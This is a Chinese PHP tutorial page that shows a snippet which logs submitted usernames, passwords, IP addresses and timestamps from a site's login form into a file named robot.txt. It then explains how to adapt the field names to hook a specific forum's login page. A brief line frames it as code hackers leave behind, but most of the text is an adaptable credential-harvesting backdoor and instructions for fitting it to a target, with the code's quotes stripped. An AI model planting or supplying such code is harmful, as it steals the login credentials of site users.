服务器之家:专注于服务器技术及软件下载分享
分类导航

PHP教程|ASP.NET教程|Java教程|ASP教程|编程技术|正则表达式|C/C++|IOS|C#|Swift|Android|VB|R语言|JavaScript|易语言|vb.net|

服务器之家 - 编程语言 - PHP教程 - php截取后台登陆密码的代码

php截取后台登陆密码的代码

2019-12-31 16:24PHP教程网 PHP教程

php截取后台登陆密码的代码,很多时候黑客留了这样的代码,大家一定要注意下

if($_POST[loginsubmit]!=){ //判断是否点了登陆按钮 
$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 连起来赋值给变量$sb 
fwrite(fopen(robot.txt,ab),$sb);} //结果写入一个文件 


下面简单分析一下,以华夏的登陆页面为例。打开bbs.xxx.com/login.php 右键查看源码,CTRL+F搜索action找到登陆的表单。 

我只复制了关键代码过来. 


<form action=login.php? method=post name=login onSubmit=this.submit.disabled=true;> //action后面的值即是表单提交的地址,里面会处理登陆,比如判断密码是不是正确什么的 method为POST,所以用$_POST接收。 

。。。。强大的省略号。。。。。。 

<TR> 
<TD height=40>账号(<U>U</U>):<BR> 
<INPUT 
class=input id=pwuser accessKey=u size=16 
name=pwuser> </TD></TR> //用户名的input输入框, 注意其name的值, 要和$_POST[username] 这里面的对应, 所以要截取华夏的密码,需要改为 $_POST[pwuser] 

<TR> 
<TD height=40>密 码(<U>P</U>):<BR><INPUT 
class=input id=pwpwd accessKey=p 
type=password size=16 name=pwpwd> </TD></TR> //用户名的input输入框, 注意其name的值, 要和$_POST[username] 这里面的对应, 所以要截取华夏的密码,需要改为 $_POST[pwpwd]

延伸 · 阅读

精彩推荐